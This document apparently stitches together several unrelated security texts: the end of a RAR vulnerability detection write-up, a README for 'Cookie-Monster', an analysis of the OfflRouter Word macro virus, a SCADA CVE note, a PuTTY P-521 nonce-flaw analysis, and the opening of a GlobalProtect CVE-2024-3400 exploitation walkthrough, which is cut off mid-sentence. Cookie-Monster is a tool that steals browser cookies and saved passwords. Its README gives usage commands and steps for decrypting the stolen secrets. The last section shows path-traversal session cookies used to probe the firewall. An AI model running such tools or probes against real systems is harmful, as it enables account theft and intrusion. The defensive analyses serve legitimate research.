The detection device must then calculate the size of the Code field. The calculation of the size of the Code field is as follows: If the lowest 3 bits of the Flags field (will be referred to as LENGTH) are less than 6, the code size is (LENGTH + 1). If LENGTH is set to 6, the code size is (LengthExt1 + 7). If LENGTH is set to 7, the code size is (LengthExt1 << data-preserve-html-node="true" 8) | LengthExt2. After the size of the Code field is calculated, the Code field must be parsed according to the following structure:

All numerical fields within this structure (FilterNum, BlockStart, BlockLength, register values, and ByteCodeLen) must be read according to the algorithm implemented in the RarVM::ReadData() function of the UnRAR source code. The algorithm reads 2 bits of data, signifying the number of bits of data containing the numerical value. Note that some of the fields in this structure are optional and depend on flags set in the Flags field of the RARVM filter structure.

After extracting all necessary fields, the detection device must check for the following conditions:

• The CRC-32 checksum of the ByteCode field is 0xAD576887 and the ByteCodeLen field is 0x35 OR the CRC-32 checksum of the ByteCode field is 0x3CD7E57E and the ByteCodeLen field is 0x39.
• The READ_REGISTERS flag is set and the value of the 5th register of the Registers field is set to 4 OR the READ_BLOCK_LENGTH flag is set and the value of the BlockLength field is set to 4. If both these conditions are met, the traffic should be considered suspicious. An attack exploiting this vulnerability is likely underway.

Notes:

• All multi-byte integers are in little-endian byte order.
• All offsets and sizes are in bytes unless otherwise specified.

Conclusion

Microsoft patched this vulnerability in January 2024 and assigned it CVE-2024-20697. While they did not recommend any mitigating factors, there are some additional measures you can take to help protect from this bug being exploited. This includes not extracting RAR archive files from untrusted sources and filtering traffic using the guidance provided in the section “Detection Guidance” section of this blog. Still, it is recommended to apply the vendor patch to completely address this issue.

Special thanks to Guy Lederfein and Jason McFadyen of the Trend Micro Research Team for providing such a thorough analysis of this vulnerability. For an overview of Trend Micro Research services please visit http://go.trendmicro.com/tis/.

The threat research team will be back with other great vulnerability analysis reports in the future. Until then, follow the team on Twitter, Mastodon, LinkedIn, or Instagram for the latest in exploit techniques and security patches.

Cookie-Monster - BOF To Steal Browser Cookies & Credentials


Steal browser cookies for edge, chrome and firefox through a BOF or exe! Cookie-Monster will extract the WebKit master key, locate a browser process with a handle to the Cookies and Login Data files, copy the handle(s) and then filelessly download the target. Once the Cookies/Login Data file(s) are downloaded, the python decryption script can help extract those secrets! Firefox module will parse the profiles.ini and locate where the logins.json and key4.db files are located and download them. A seperate github repo is referenced for offline decryption.


BOF Usage

Usage: cookie-monster [ --chrome || --edge || --firefox || --chromeCookiePID <pid> || --chromeLoginDataPID <PID> || --edgeCookiePID <pid> || --edgeLoginDataPID <pid>] 
cookie-monster Example:
cookie-monster --chrome
cookie-monster --edge
cookie-moster --firefox
cookie-monster --chromeCookiePID 1337
cookie-monster --chromeLoginDataPID 1337
cookie-monster --edgeCookiePID 4444
cookie-monster --edgeLoginDataPID 4444
cookie-monster Options:
--chrome, looks at all running processes and handles, if one matches chrome.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD
--edge, looks at all running processes and handles, if one matches msedge.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD
--firefox, looks for profiles.ini and locates the key4.db and logins.json file
--chromeCookiePID, if chrome PI D is provided look for the specified process with a handle to cookies is known, specifiy the pid to duplicate its handle and file
--chromeLoginDataPID, if chrome PID is provided look for the specified process with a handle to Login Data is known, specifiy the pid to duplicate its handle and file
--edgeCookiePID, if edge PID is provided look for the specified process with a handle to cookies is known, specifiy the pid to duplicate its handle and file
--edgeLoginDataPID, if edge PID is provided look for the specified process with a handle to Login Data is known, specifiy the pid to duplicate its handle and file

EXE usage

Cookie Monster Example:
cookie-monster.exe --all
Cookie Monster Options:
-h, --help Show this help message and exit
--all Run chrome, edge, and firefox methods
--edge Extract edge keys and download Cookies/Login Data file to PWD
--chrome Extract chrome keys and download Cookies/Login Data file to PWD
--firefox Locate firefox key and Cookies, does not make a copy of either file

Decryption Steps

Install requirements

pip3 install -r requirements.txt

Base64 encode the webkit masterkey

python3 base64-encode.py "\xec\xfc...."

Decrypt Chrome/Edge Cookies File

python .\decrypt.py "XHh..." --cookies ChromeCookie.db

Results Example:
-----------------------------------
Host: .github.com
Path: /
Name: dotcom_user
Cookie: KingOfTheNOPs
Expires: Oct 28 2024 21:25:22

Host: github.com
Path: /
Name: user_session
Cookie: x123.....
Expires: Nov 11 2023 21:25:22

Decrypt Chome/Edge Passwords File

python .\decrypt.py "XHh..." --passwords ChromePasswords.db

Results Example:
-----------------------------------
URL: https://test.com/
Username: tester
Password: McTesty

Decrypt Firefox Cookies and Stored Credentials:
https://github.com/lclevy/firepwd

Installation

Ensure Mingw-w64 and make is installed on the linux prior to compiling.

make

to compile exe on windows

gcc .\cookie-monster.c -o cookie-monster.exe -lshlwapi -lcrypt32

TO-DO

  • update decrypt.py to support firefox based on firepwd and add bruteforce module based on DonPAPI

References

This project could not have been done without the help of Mr-Un1k0d3r and his amazing seasonal videos! Highly recommend checking out his lessons!!!
Cookie Webkit Master Key Extractor: https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF
Fileless download: https://github.com/fortra/nanodump
Decrypt Cookies and Login Data: https://github.com/login-securite/DonPAPI



OfflRouter virus causes Ukrainian users to upload confidential documents to VirusTotal

  • During a threat-hunting exercise, Cisco Talos discovered documents with potentially confidential information originating from Ukraine. The documents contained malicious VBA code, indicating they may be used as lures to infect organizations. 
  • The results of the investigation have shown that the presence of the malicious code is due to the activity of a rare multi-module virus that's delivered via the .NET interop functionality to infect Word documents. 
  • The virus, named OfflRouter, has been active in Ukraine since 2015 and remains active on some Ukrainian organizations’ networks, based on over 100 original infected documents uploaded to VirusTotal from Ukraine and the documents’ upload dates. 
  • We assess that OfflRouter is the work of an inventive but relatively inexperienced developer, based on the unusual choice of the infection mechanism, the apparent lack of testing and mistakes in the code. 
  • The author’s design choices may have limited the spread of the virus to very few organizations while allowing it to remain active and undetected for a long period of time. 
OfflRouter virus causes Ukrainian users to upload confidential documents to VirusTotal

As a part of a regular threat hunting exercise, Cisco Talos monitors files uploaded to open-source repositories for potential lures that may target government and military organizations. Lures are created from legitimate documents by adding content that will trigger malicious behavior and are often used by threat actors. 

For example, malicious document lures with externally referenced templates written in Ukrainian language are used by the Gamaredon group as an initial infection vector. Talos has previously discovered military theme lures in Ukrainian and Polish, mimicking the official PowerPoint and Excel files, to launch the so-called “Picasso loader,” which installs remote access trojans (RATs) onto victims' systems. 

In July 2023, threat actors attempted to use lures related to the NATO summit in Vilnius to install the Romcom remote access trojan. These are just some of the reasons why hunting for document lures is vital to any threat intelligence operation.  

In February 2024, Talos discovered several documents with content that seems to originate from Ukrainian local government organizations and the Ukrainian National Police uploaded to VirusTotal. The documents contained VBA code to drop and run an executable with the name `ctrlpanel.exe`, which raised our suspicion and prompted us to investigate further.   

Eventually, we discovered over 100 uploaded documents with potentially confidential information about government and police activities in Ukraine. The analysis of the code showed unexpected results – instead of lures used by advanced actors, the uploaded documents were infected with a multi-component VBA macro virus OfflRouter, created in 2015. The virus is still active in Ukraine and is causing potentially confidential documents to be uploaded to publicly accessible document repositories.   

Attribution 

Although the virus is active in Ukraine, there are no indications that it was created by an author from that region. Even the debugging database string used to name the virus “E:\Projects\OfflRouter2\OfflRouter2\obj\Release\ctrlpanel.pdb” present in the ctrlpanel.exe does not point to a non-English speaker. 

From the choice of the infection mechanism, VBA code generation, several mistakes in the code, and the apparent lack of testing, we estimate that the author is an inexperienced but inventive programmer.  

The choices made during the development limited the virus to a specific geographic location and allowed it to remain active for almost 10 years. 

OfflRouter has been confined to Ukraine 

According to earlier research by the Slovakian government CSIRT (Computer Security Incident Response Team) team, some infected documents were already publicly available on the Ukrainian National Police website in 2018.  

The newly discovered infected documents are written in Ukrainian, which may have contributed to the fact that the virus is rarely seen outside Ukraine. Since the malware has no capabilities to spread by email, it can only be spread by sharing documents and removable media, such as USB memory sticks with infected documents. The inability to spread by email and the initial documents in Ukrainian are additional likely reasons the virus stayed confined to Ukraine.  

OfflRouter virus causes Ukrainian users to upload confidential documents to VirusTotal
One of the documents was recently uploaded to VirusTotal from Ukraine. 

The virus targets only documents with the filename extension .doc, the default extension for the OLE2 documents, and it will not try to infect other filename extensions. The default Word document filename extension for the more recent Word versions is .docx, so few documents will be infected as a result.  

This is a possible mistake by the author, although there is a small probability that the malware was specifically created to target a few organizations in Ukraine that still use the .doc extension, even if the documents are internally structured as Office Open XML documents.  

Other issues prevented the virus from spreading more successfully and most of them are found in the executable module, ctrlpanel.exe, dropped and executed by the VBA part of the code.  

When the virus is run, it attempts to set the value Ctrlpanel of the registry key HKLM\Software\Microsoft\Windows\CurrentVersion\Run so that it runs on the Windows boot. An internal global string _RootDir is used as the value, however, the string only contains the folder where the ctrlpanel.exe is found and not its full path, which makes this auto-start measure fail.  

One interesting concept in the .NET module is the entire process of infecting documents. As a part of the infection process, the VBA code is generated by combining the code taken from the hard-coded strings in the module with the encoded bytes of the ctrlpanel.exe binary. This makes the generated code the same for every infection cycle and rather easy to detect. Having a VBA code generator in the .NET code has more potential to make the infected documents more difficult to detect.  

Once launched, the executable module stays active in memory and uses threading timers to execute two background worker objects, the first one tasked with the infection of documents and the second one with checking for the existence of the potential plugin modules for the .NET module.  

The infection background worker enumerates the mounted drives and attempts to find documents to infect by using the Directory.Getfiles function with the string search pattern “*.doc” as a parameter.  

One of the parameters of the function is the SearchOption parameter which specifies the option to search in subdirectories or only the in the root folder. For fixed drives, the module chooses to search only the root folder, which is an unusual choice, as it is quite unlikely that the root folder will hold any documents to infect.  

For removable drives, the module also searches all subfolders, which likely makes it more successful. Finally, it checks the list of recent documents in Word and attempts to infect them, which contributes to the success of the virus spreading to other documents on fixed drives.  

OfflRouter virus causes Ukrainian users to upload confidential documents to VirusTotal
The choice of document filename extensions is limited to .doc.

OfflRouter VBA code drops and executes the main executable module 

The VBA part of the virus runs when a document is opened, provided macros are enabled, and it contains code to drop and run the executable module ctrlpanel.exe.

OfflRouter virus causes Ukrainian users to upload confidential documents to VirusTotal
The VBA part creates and executes the executable module of the virus.

 The beginning of the macro code defines a function that checks if the file already exists and if it does not, it opens it for writing and calls functions CheckHashX, which at first glance looks like containing junk code to reset the value of the variable `Y`. However, the variable Y is defined as a private property with an overridden setter function, which converts the variable value assignment into appending the supplied value to the end of the opened executable module C:\Users\Public\ctrlpanel.exe. Every code line that looks like an assignment appends the assigned value to the end of the file, and that is how the executable module is written.  

This technique is likely implemented to make the detection of the embedded module a bit more difficult, as the executable mode is not stored as a contiguous block, but as a sequence of integer values that look like being assigned to a variable.  

To a more experienced analyst, this code looks like garbage code generated by polymorphic engines, and it raises the question of why the author has not extended the code generation to pseudo-randomize the code.  

OfflRouter virus causes Ukrainian users to upload confidential documents to VirusTotal
Infected Word documents drop the .NET component that infects other documents

The virus is unique, as it consists of VBA and executable modules with the infection logic contained in the PE executable .NET module.  

OfflRouter virus causes Ukrainian users to upload confidential documents to VirusTotal
The property Y has an overridden setter function to write into a file.

Ctrlpanel.exe .NET module 

The unique infection method used by ctrlpanel.exe is through the Office Interop classes of .NET VBProject interface Microsoft.Vbe.Interop and the Microsoft.Office.Interop.Word class that exposes the functionality of the Word application.  

The Interop.Word class is used to instantiate a Document class which allows access to the VBA macro code and the addition of the code to the target document file using the standard Word VBA functions.  

When the .NET module ctrlpanel.exe is launched, it attempts to open a mutex ctrlpanelapppppp to check if another module instance is already running on the system. If the mutex already exists, the process will terminate.  

Suppose no other module instances are running. In that case, ctrlpanel.exe creates the mutex named “ctrlpanelapppppp”, attempts to set the registry run key so the module runs on system startup, and finally initializes two timers to run associated background timer callbacks – VBAClass_Timer_Callback and PluginClass_TimerCallback, implemented to start the Run function of the classes VBAClass and PluginClass, respectively. 

OfflRouter virus causes Ukrainian users to upload confidential documents to VirusTotal
Ctrlpanel.exe has two threads of execution.

The VBAClass_Timer_Callback will be called one second after the creation of VBAClass_Timer timer and the PluginClass_Timer_Callback three seconds after the creation of the PluginClass_Timer.  

The full functionality of the executable module is implemented by two classes, VBAClass and PluginClass, specifically within their respective functions Backgroundworker_DoWork. 

VBAClass is tasked with generating VBA code and infecting other Word documents 

 The background worker function runs in an infinite loop and contains two major parts, the first is tasked with the document infection and the second with finding the documents to infect, the logic we already described above.  

The infection iterates through a list of the document candidates to infect and uses an innovative method to check the document infection marker to avoid multiple infection processes – the function checks the document creation metadata, adds the creation times, and checks the value of the sum. If the sum is zero, the document is considered already infected.  

OfflRouter virus causes Ukrainian users to upload confidential documents to VirusTotal
The file system time of creation is used as an infection marker.

If the document to be infected is created in the Word 97-2003 binary format (OLE2), the document will be saved with the same name in Microsoft Office Open XML format with enabled macros (DOCX).  

The infection uses the traditional VBA class infection routine. It accesses the Visual Basic code module of the first VBComponent and then adds the code generated by the function MyScript to the document’s code module. After that, the infected document is saved.  

OfflRouter virus causes Ukrainian users to upload confidential documents to VirusTotal
The target document is converted to .docx and then infected.

The code generation function MyScript contains static strings and instructions to dynamically generate code that will be added to infected documents. It opens its own executable ctrlpanel.exe for reading and reads the file 32-bit by 32-bit value which gets converted to decimal strings that can be saved as VBA code. For every repeating 32-bit value, most commonly for zero, the function creates a for loop to write the repeating value to the dropped file. The purpose is unclear, but it is likely to achieve a small saving in the size of the code and compress it.  

OfflRouter virus causes Ukrainian users to upload confidential documents to VirusTotal
Repeating 32-bit values are “compressed.”

For every 4,096 bytes, the code generates a new CheckHashX subroutine to break the code into chunks. The purpose of this is not clear.  

OfflRouter virus causes Ukrainian users to upload confidential documents to VirusTotal
The VBA code infecting files is dynamically created.

 After the file is infected, the background worker adds the infection marker file by setting the values of hour, minute, second, and millisecond creation times to zero.

OfflRouter virus causes Ukrainian users to upload confidential documents to VirusTotal
The infection market is set after the infected file has been copied to its original location.

PluginClass is tasked with discovering and loading plugins 

Ctrlpanel.exe can also search for potential plugins present on removable media, which is very unusual for simple viruses that infect documents. This may indicate that the author’s aims were a bit more ambitious than the simple VBA infection. 

Searching for the plugins in removable drives is unusual as it requires the plugins to be delivered to the system on a physical media, such as a USB drive or a CD-ROM. The plugin loader searches for any files with the filename extension .orp, decodes its name using Base64 decoding function, decodes the file content using Base64 decoding, copies the file into the c:\users\public\tools folder with the previously decoded name and the extension .exe and finally executes the plugin. 

OfflRouter virus causes Ukrainian users to upload confidential documents to VirusTotal
Any plugins found on a removable drive are decoded, copied to drive C: and launched.

If the plugins are already present on an infected machine, ctrlpanel.exe will try to encode them using Base64 encoding, copy them to the root of the attached removable media with the filename extension “.orp” and set the newly created file attributes to the values system and hidden so that they are not displayed by default by Windows File Explorer. 

It is unclear if the initial vector is a document or the executable module ctrlpanel.exe 

The advantage of the two-module virus is that it can be spread as a standalone executable or as an infected document. It may even be advantageous to initially spread as an executable as the module can run standalone and set the registry keys to allow execution of the VBA code and changing of the default saved file formats to doc before infecting documents. That way, the infection may be a bit stealthier.  

The following registry keys are set: 
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Security\AccessVBOM (to allow access to Visual Basic Object Model by the external applications) 
  
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Security\VBAWarnings (to disable warnings about potential Macro code in the infected documents) 
  
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Options\DefaultFormat (to set the default format to DOC) 

Coverage 

Ways our customers can detect and block this threat are listed below. 

OfflRouter virus causes Ukrainian users to upload confidential documents to VirusTotal

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.  

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat. 

Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.  

Cisco Secure Malware Analytics (formerly Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products. 

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.  

Additional protection with context to your specific environment and threat data are available from the Firewall Management Center.  

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.  

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. Snort SIDs for this threat are  

The following ClamAV signatures detect malware artifacts related to this threat: 

Doc.Malware.Valyria-6714124-0 

Win.Virus.OfflRouter-10025942-0 

IOCs 

IOCs for this research can also be found at our GitHub repository here

10e720fbcf797a2f40fbaa214b3402df14b7637404e5e91d7651bd13d28a69d8 - .NET module ctrlpanel.exe  

Infected documents  

2260989b5b723b0ccd1293e1ffcc7c0173c171963dfc03e9f6cd2649da8d0d2c 

2b0927de637d11d957610dd9a60d11d46eaa3f15770fb474067fb86d93a41912 

802342de0448d5c3b3aa6256e1650240ea53c77f8f762968c1abd8c967f9efd0 

016d90f337bd55dfcfbba8465a50e2261f0369cd448b4f020215f952a2a06bce 

Mutex 

ctrlpanelapppppp 

 

CVE-2024-3746

CWE-284 IMPROPER ACCESS CONTROL:

The entire parent directory - C:\ScadaPro and its sub-directories and files are configured by default to allow users, including unprivileged users, to write or overwrite files.

Measuresoft recommends that users manually reconfigure the vulnerable directories so that they are not writable by everyone.

Flaw in PuTTY P-521 ECDSA signature generation leaks SSH private keys

This article provides a technical analysis of CVE-2024-31497, a vulnerability in PuTTY discovered by Fabian Bäumer and Marcus Brinkmann of the Ruhr University Bochum.

PuTTY, a popular Windows SSH client, contains a flaw in its P-521 ECDSA implementation. This vulnerability is known to affect versions 0.68 through 0.80, which span the last 7 years. This potentially affects anyone who has used a P-521 ECDSA SSH key with an affected version, regardless of whether the ECDSA key was generated by PuTTY or another application. Other applications that utilise PuTTY for SSH or other purposes, such as FileZilla, are also affected.

An attacker who compromises an SSH server may be able to leverage this vulnerability to compromise the user’s private key. Attackers may also be able to compromise the SSH private keys of anyone who used git+ssh with commit signing and a P-521 SSH key, simply by collecting public commit signatures.

Background

Elliptic Curve Digital Signature Algorithm (ECDSA) is a cryptographic signing algorithm. It fulfils a similar role to RSA for message signing – an ECDSA public and private key pair are generated, and signatures generated with the private key can be validated using the public key. ECDSA can operate over a number of different elliptic curves, with common examples being P-256, P-384, and P-521. The numbers represent the size of the prime field in bits, with the security level (i.e. the comparable key size for a symmetric cipher) being roughly half of that number, e.g. P-256 offers roughly a 128-bit security level. This is a significant improvement over RSA, where the key size grows nonlinearly and a 3072-bit key is needed to achieve a 128-bit security level, making it much more expensive to compute. As such, RSA is largely being phased out in favour of EC signature algorithms such as ECDSA and EdDSA/Ed25519.

In the SSH protocol, ECDSA may be used to authenticate users. The server stores the user’s ECDSA public key in the known users file, and the client signs a message with the user’s private key in order to prove the user’s identity to that server. In a well-implemented system, a malicious server cannot use this signed message to compromise the user’s credentials.

Vulnerability Details

ECDSA signatures are (normally) non-deterministic and rely on a secure random number, referred to as a nonce (“number used once”) or the variable k in the mathematical description of ECDSA, which must be generated for each new signature. The same nonce must never be used twice with the same ECDSA key for different messages, and every single bit of the nonce must be completely unpredictable. An unfortunate property of ECDSA is that the private key can be compromised if a nonce is reused with the same key and a different message, or if the nonce generation is predictable.

Ordinarily the nonce is generated with a cryptographically secure pseudorandom number generator (CSPRNG). However, PuTTY’s implementation of DSA dates back to September 2001, around a month before Windows XP was released. Windows 95 and 98 did not provide a CSPRNG and there was no reliable way to generate cryptographically secure numbers on those operating systems. The PuTTY developers did not trust any of the available options, recognising that a weak CSPRNG would not be sufficient due to DSA’s strong reliance on the security of the random number generator. In response they chose to implement an alternative nonce generation scheme. Instead of generating a random number, their scheme utilised SHA512 to generate a 512-bit number based on the private key and the message.

The code comes with the following comment:

* [...] we must be pretty careful about how we
* generate our k. Since this code runs on Windows, with no
* particularly good system entropy sources, we can't trust our
* RNG itself to produce properly unpredictable data. Hence, we
* use a totally different scheme instead.
*
* What we do is to take a SHA-512 (_big_) hash of the private
* key x, and then feed this into another SHA-512 hash that
* also includes the message hash being signed. That is:
*
*   proto_k = SHA512 ( SHA512(x) || SHA160(message) )
*
* This number is 512 bits long, so reducing it mod q won't be
* noticeably non-uniform. So
*
*   k = proto_k mod q
*
* This has the interesting property that it's _deterministic_:
* signing the same hash twice with the same key yields the
* same signature.
*
* Despite this determinism, it's still not predictable to an
* attacker, because in order to repeat the SHA-512
* construction that created it, the attacker would have to
* know the private key value x - and by assumption he doesn't,
* because if he knew that he wouldn't be attacking k!

This is a clever trick in principle: since the attacker doesn’t know the private key, it isn’t possible to predict the output of SHA512 even if the message is known ahead of time, and thus the generated number is unpredictable. Since SHA512 is a cryptographically secure hash, it is computationally infeasible to guess any bit of its output until you compute the hash. When the PuTTY developers implemented ECDSA, they re-used this DSA implementation, resulting in a somewhat odd deterministic implementation of ECDSA where signing the same message twice results in the same nonce and signature. This is certainly unusual, but it does not count as nonce reuse in a compromising sense – you’re essentially just redoing the same maths and getting the same result.

Unfortunately, when the PuTTY developers repurposed this DSA implementation for ECDSA in 2017, they made an oversight. Prior usage for DSA did not utilise keys larger than 512 bits, but P-521 in ECDSA needs 521 bits. Recall that ECDSA is only secure when every single bit of the key is unpredictable. In PuTTY’s implementation, though, they only generate 512 bits of random nonce using SHA512, leaving the remaining 9 bits as zero. This results in a nonce bias that can be exploited to compromise the private key. If an attacker has access to the public key and around 60 different signatures they can recover the private key. A detailed description of this key recovery attack can be found in this cryptopals writeup.

Had the PuTTY developers extended their solution to fill all 521 bits of the key, e.g. with one additional hash function call to fill the last 9 bits, their deterministic nonce generation scheme would have remained secure. Given the constraint of not having access to a CSPRNG, it is actually a clever solution to the problem. RFC6979 was later released as a standard method for implementing deterministic ECDSA signatures, but this was not implemented by PuTTY as their implementation predated that RFC.

Windows XP, released a few months after PuTTY wrote their DSA implementation, introduced a CSPRNG API, CryptGenRandom, which can be used for standard non-deterministic implementations of ECDSA. While one could postulate that the PuTTY developers might have used this API had they written their DSA implementation just a few months later, the developers have made several statements about their distrust in Windows’ random number generator APIs of that era and their preference for deterministic implementations. This distrust may have been founded at the time, but such concerns are certainly unfounded on modern versions of Windows.

Impact

This vulnerability exists specifically in the P-521 ECDSA signature generation code in PuTTY, so it only affects P-521 and not other curves such as P-256 and P-384. However, since it is the signature generation which is affected, any P-521 key that was used with a vulnerable version of PuTTY may be compromised regardless of whether that key was generated by PuTTY or something else. It is the signature generation that is vulnerable, not the key generation. Other implementations of P-521 in SSH or other protocols are not affected; this vulnerability is specific to PuTTY.

An attacker cannot leverage this vulnerability by passively sniffing SSH traffic on the network. The SSH protocol first creates a secure tunnel to the server, in a similar manner to connecting to a HTTPS server, authenticating the server by checking the server key fingerprint against the cached fingerprint. The server then prompts the client for authentication, which is sent through this secure tunnel. As such, the ECDSA signatures are encrypted before transmission in this context, so an attacker cannot get access to the signatures needed for this attack through passive network sniffing.

However, an attacker who performs an active man-in-the-middle attack (e.g. via DNS spoofing) to redirect the user to a malicious SSH server would be able to capture signatures in order to exploit this vulnerability if the user ignores the SSH key fingerprint change warning. Alternatively, an attacker who compromised an SSH server could also use it to capture signatures to exploit this vulnerability, then recover the user’s private key in order to compromise other systems. This also applies to other applications (e.g. FileZilla, WinSCP, TortoiseGit, TortoiseSVN) which leverage PuTTY for SSH functionality.

A more concerning issue is the use of PuTTY for git+ssh, which is a way of interacting with a git repository over SSH. PuTTY is commonly used as an SSH client by development tools that support git+ssh. Users can digitally sign git commits with their SSH key, and these signatures are published alongside the commit as a way of authenticating that the commit was made by that user. These commit logs are publicly available on the internet, alongside the user’s public key, so an attacker could search for git repositories with P-521 ECDSA commit signatures. If those signatures were generated by a vulnerable version of PuTTY, the user’s private key could be compromised and used to compromise the server or make fraudulent signed commits under that user’s identity.

Fortunately, users who use P-521 ECDSA SSH keys, git+ssh via PuTTY, and commit signing represent a very small fraction of the population. However, due to the law of large numbers, there are bound to be a few out there who end up being vulnerable to this attack. In addition, informal observations suggest that users may be more likely to select P-521 when offered a choice of P-256, P-384, or P-521, likely due to the perception that the larger key size offers more security. Somewhat ironically, P-521 ended up being the only curve implementation in PuTTY that was insecure.

Remediation

The PuTTY developers have resolved this issue by reimplementing the deterministic nonce generation using the approach described in the RFC6979 standard.

Any P-521 keys that have ever been used with any of the following software should be treated as compromised:

  • PuTTY 0.68 – 0.80
  • FileZilla 3.24.1 – 3.66.5
  • WinSCP 5.9.5 – 6.3.2
  • TortoiseGit 2.4.0.2 – 2.15.0
  • TortoiseSVN 1.10.0 – 1.14.6

Users should update their software to the latest version.

If a P-521 key has ever been used for git commit signing with development tools on Windows, it is advisable to assume that the key may be compromised and change it immediately.

References

The post Flaw in PuTTY P-521 ECDSA signature generation leaks SSH private keys appeared first on LRQA Nettitude Labs.

Palo Alto - Putting The Protecc In GlobalProtect (CVE-2024-3400)

Palo Alto - Putting The Protecc In GlobalProtect (CVE-2024-3400)

Welcome to April 2024, again. We’re back, again.

Over the weekend, we were all greeted by now-familiar news—a nation-state was exploiting a “sophisticated” vulnerability for full compromise in yet another enterprise-grade SSLVPN device.

We’ve seen all the commentary around the certification process of these devices for certain .GOVs - we’re not here to comment on that, but sounds humorous.

Interesting:
As many know, Palo-Alto OS is U.S. gov. approved for use in some classified networks. As such, U.S. gov contracted labs periodically evaluate PAN-OS for the presence of easy to exploit vulnerabilities.

So how did that process miss a bug like 2024-3400?

Well...

— Brian in Pittsburgh (@arekfurt) April 15, 2024

We would comment on the current state of SSLVPN devices, but like jokes about our PII being stolen each week, the news of yet another SSLVPN RCE is getting old.

On Friday 12th April, the news of CVE-2024-3400 dropped. A vulnerability that “based on the resources required to develop and exploit a vulnerability of this nature” was likely used by a “highly capable threat actor”.

Exciting.

Here at watchTowr, our job is to tell the organisations we work with whether appliances in their attack surface are vulnerable with precision. Thus, we dived in.

If you haven’t read Volexity’s write-up yet, we’d advise reading it first for background information. A friendly shout-out to the team @ Volexity - incredible work, analysis and a true capability that we as an industry should respect. We’d love to buy the team a drink(s).

CVE-2024-3400

We start with very little, and as in most cases are armed with a minimal CVE description:

A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks 
PAN-OS software for specific PAN-OS versions and distinct feature configurations may
enable an unauthenticated attacker to execute arbitrary code with root privileges on
the firewall.
Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by 
this vulnerability.

What is omitted here is the pre-requisite that telemetry must be enabled to achieve command injection with this vulnerability. From Palo Alto themselves:

This issue is applicable only to PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 firewalls 
configured with GlobalProtect gateway or GlobalProtect portal (or both) and device
telemetry enabled.

The mention of ‘GlobalProtect’ is pivotal here - this is Palo Alto’s SSLVPN implementation, and finally, my kneejerk reaction to turn off all telemetry on everything I own is validated! A real vuln that depends on device telemetry!

While the above was correct at the time of writing, Palo Alto have now confimed that telemetry is not required to exploit this vulnerability. Thanks to the Palo Alto employee that reached out to update us that this is an even bigger mess than first thought.

Our Approach To Analysis

As always, our journey begins with a hop, skip and jump to Amazon’s AWS Marketplace to get our hands on a shiny new box to play with.

Fun fact: partway through our investigations, Palo Alto took the step of removing the vulnerable version of their software from the AWS Marketplace - so if you’re looking to follow along with our research at home, you may find doing so quite difficult.

Accessing The File System

Anyway, once you get hold of a running VM in an EC2, it is trivial to access the device’s filesytem. No disk encryption is at play here, which means we can simply boot the appliance from a Linux root filesystem and mount partitions to our heart’s content.

The filesystem layout doesn’t pack any punches, either. There’s the usual nginx setup, with one configuration file exposing GlobalProtect URLs and proxying them to a service listening on the loopback interface via the proxypass directive, while another configuration file exposes the management UI:

location ~ global-protect/(prelogin|login|getconfig|getconfig_csc|satelliteregister|getsatellitecert|getsatelliteconfig|getsoftwarepage|logout|logout_page|gpcontent_error|get_app_info|getmsi|portal\\/portal|portal/consent).esp$ {
    include gp_rule.conf;
    proxy_pass   http://$server_addr:20177;
}

There’s a handy list of endpoints there, allowing us to poke around without even cracking open the handler binary.

With the bug class as it is - command injection - it’s always good to poke around and try our luck with some easy injections, but to no avail here. It’s time to crack open the hander for this mysterious service. What provides it?

Well, it turns out that it is handled by the gpsvc binary. This makes sense, it being the Global Protect service. We plopped this binary into the trusty IDA Pro, expecting a long and hard voyage of reversing, only to be greeted with a welcome break:

Palo Alto - Putting The Protecc In GlobalProtect (CVE-2024-3400)

Debug symbols! Wonderful! This will make reversing a lot easier, and indeed, those symbols are super-useful.

Our first call, somewhat obviously, is to find references to the system call (and derivatives), but there’s no obvious injection point here. We’re looking at something more subtle than a straightforward command injection.

Unmarshal Reflection

Our big break occurred when we noticed some weird behavior when we fed the server a malformed session ID. For example, using the session value Cookie: SESSID=peekaboo; and taking a look at the logs, we can see a somewhat-opaque clue:

{"level":"error","task":"1393405-22","time":"2024-04-16T06:21:51.382937575-07:00","message":"failed to unmarshal session(peekaboo) map , EOF"}

An EOF? That kind-of makes sense, since there’s no session with this key. The session-store mechanism has failed to find information about the session. What happens, though, if we pass in a value containing a slash? Let’s try Cookie: SESSID=foo/bar;:

2024-04-16 06:19:34 {"level":"error","task":"1393401-22","time":"2024-04-16T06:19:34.32095066-07:00","message":"failed to load file /tmp/sslvpn/session_foo/bar,

Huh, what’s going on here? Is this some kind of directory traversal?! Let’s try our luck with our old friend .. , supplying the cookie Cookie: SESSID=/../hax;:

2024-04-16 06:24:48 {"level":"error","task":"1393411-22","time":"2024-04-16T06:24:48.738002019-07:00","message":"failed to unmarshal session(/../hax) map , EOF"}

Ooof, are we traversing the filesystem here? Maybe there’s some kind of file write possible. Time to crack open that disassembly and take a look at what’s going on. Thanks to the debug symbols this is a quick task, as we quickly find the related symbols:

